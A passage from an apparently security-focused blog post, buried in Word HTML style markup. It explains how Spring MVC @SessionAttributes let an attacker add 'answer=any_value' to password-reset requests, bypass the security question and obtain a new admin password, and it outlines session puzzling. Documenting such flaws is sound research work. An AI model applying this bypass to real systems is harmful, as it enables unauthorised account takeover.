<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin-top:0cm;
mso-para-margin-right:0cm;
mso-para-margin-bottom:8.0pt;
mso-para-margin-left:0cm;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-fareast-language:EN-US;}
</style>
<![endif]-->
</div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">4) When the
user sends an answer for the question, the resetQuestionHandler method handles
it. The method gets the answer from "answerReset" param and compares
with the value in answer field from the user object. If answers match, the
method generates a new secure password and shows it to the user.</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">As you can
see, there is no @ModelAttribute near User user (in the method argument).
However, Spring MVC is smart and automatically gets value from the session.
Actually, it uses the same logic: gets value from somewhere, populates it with
a user request.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">So, what we
can do as attackers?</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">a) We can
add "answer=any_value", when we send a request to
resetViewQuestionHandler. Then our answer is populated with an object from a
session. So, we can change a correct answer to any value and after that set the
same value for the resetQuestionHandler method.</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Therefore, we
can start the recovery process for admin user, bypass answer checking, and get
a new password for admin.</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">b) We can
add "answer=any_value" on the last step too (resetQuestionHandler)
and get the same results. Actually, we can change a whole object if we would
like.</span></div>
<br />
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFQx42ALpgmb2u3AnBRXsVct2mgfcIsWhmMS1avgefNpy-0vASOyAkCfYyvp84OpE6l_QA2nYdxyhOyDTSrpHwCrex0QkKnz1rInCsRgGsYtV_AYK2tbmxQq-GqLZAbrExVb7krClJ55K2/s1600/6.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="137" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFQx42ALpgmb2u3AnBRXsVct2mgfcIsWhmMS1avgefNpy-0vASOyAkCfYyvp84OpE6l_QA2nYdxyhOyDTSrpHwCrex0QkKnz1rInCsRgGsYtV_AYK2tbmxQq-GqLZAbrExVb7krClJ55K2/s640/6.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<h3 class="MsoNormal" style="text-align: left;">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Session Puzzling</span></h3>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">There is
another interesting thing. When a method gets an object from a session and populates
it with a user request, @SessionAttribute "forces" Spring to store
this newly populated object in the session. Therefore, we are able to control values
of the object that are stored in the session. How can we use it?</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">If there is
another controller that uses the same name of session attribute and trusts it,
then we can perform a Session Puzzling attack (Session Variable Overloading). </span><a href="https://www.owasp.org/index.php/Testing_for_Session_puzzling_(OTG-SESS-008)"><span lang="EN-US" style="mso-ansi-language: EN-US;">https</span>://<span lang="EN-US" style="mso-ansi-language: EN-US;">www</span>.<span lang="EN-US" style="mso-ansi-language: EN-US;">owasp</span>.<span lang="EN-US" style="mso-ansi-language: EN-US;">org</span>/<span lang="EN-US" style="mso-ansi-language: EN-US;">index</span>.<span lang="EN-US" style="mso-ansi-language: EN-US;">php</span>/<span lang="EN-US" style="mso-ansi-language: EN-US;">Testing</span>_<span lang="EN-US" style="mso-ansi-language: EN-US;">for</span>_<span lang="EN-US" style="mso-ansi-language: EN-US;">Session</span>_<span lang="EN-US" style="mso-ansi-language: EN-US;">puzzling</span>_(<span lang="EN-US" style="mso-ansi-language: EN-US;">OTG</span>-<span lang="EN-US" style="mso-ansi-language: EN-US;">SESS</span>-008)</a> . <span lang="EN-US" style="mso-ansi-language: EN-US;">As
far as I remember, the documentation says that a session attribute (created
using @SessionAttribute) is limited to a controller, but in practice, we can
use it in other controllers too.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>RU</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="371">
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 9"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="header"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footer"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index heading"/>
<w:LsdException Locked="false" Priority="35" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of figures"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope return"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="line number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="page number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of authorities"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="macro"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="toa heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 5"/>
<w:LsdException Locked="false" Priority="10" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Closing"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Signature"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="true"
UnhideWhenUsed="true" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Message Header"/>
<w:LsdException Locked="false" Priority="11" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Salutation"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Date"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Block Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="FollowedHyperlink"/>
<w:LsdException Locked="false" Priority="22" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Document Map"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Plain Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="E-mail Signature"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Top of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Bottom of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal (Web)"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Acronym"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Cite"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Code"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Definition"/>
